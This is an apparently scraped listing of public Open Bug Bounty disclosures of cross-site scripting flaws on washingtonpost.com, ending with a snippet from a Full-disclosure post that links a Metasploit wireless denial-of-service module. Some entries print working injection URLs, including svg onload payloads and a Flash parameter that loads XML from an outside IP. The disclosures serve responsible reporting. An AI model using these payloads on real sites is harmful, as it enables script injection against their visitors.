washingtonpost.com XSS vulnerability

Open Bug Bounty ID: OBB-281984 Description| Value ---|--- Affected Website:| washingtonpost.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

washingtonpost.com XSS vulnerability

Open Bug Bounty ID: OBB-265125 Description| Value ---|--- Affected Website:| washingtonpost.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

washingtonpost.com XSS vulnerability

Open Bug Bounty ID: OBB-247803 Description| Value ---|--- Affected Website:| washingtonpost.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

washingtonpost.com XSS vulnerability

Open Bug Bounty ID: OBB-240967 Description| Value ---|--- Affected Website:| washingtonpost.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

washingtonpost.com XSS vulnerability

Vulnerable URL: https://www.washingtonpost.com/news/arts-and-entertainment/wp/2017/03/22%22--!%3E%3CSvg/Onload=confirm%60OPENBUGBOUNTY%60%3E%22/the-thaw-between-cuba-and-america-is-real-for-evidence-try-the-flamboyant-play-at-the-kennedy-center/ Details: Description| Value ---|--- Patched:| No...

img.washingtonpost.com XSS vulnerability

Open Bug Bounty ID: OBB-154639 Description| Value ---|--- Affected Website:| img.washingtonpost.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

washingtonpost.com XSS vulnerability

Vulnerable URL: http://www.washingtonpost.com/wp-srv/artsandliving/source/media-mix/gr/flash-mediamix2.swf?xmlFile=http://45.55.162.179/1337.xml Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 185 VIP website...

washingtonpost.com XSS vulnerability

Vulnerable URL: https://www.washingtonpost.com/express/search/index.php?year=1868%27%22%3E%3Csvg/onload=alert%28/xssposed/%29%3E=07 Details: Description| Value ---|--- Patched:| Yes, at 18.01.2016 Latest check for patch:| 18.01.2016 22:12 GMT Vulnerability type:| XSS Vulnerability status:| Public...

[Full-disclosure] Fun with wireless cards...

Lorenzo's Kernel Fun project: http://kernelfun.blogspot.com/ The Metasploit 3 exploit module: http://metasploit.com/svn/framework3/trunk/modules/auxiliary/dos/wireless/daringphucball.rb Media coverage so far: http://www.securityfocus.com/brief/344...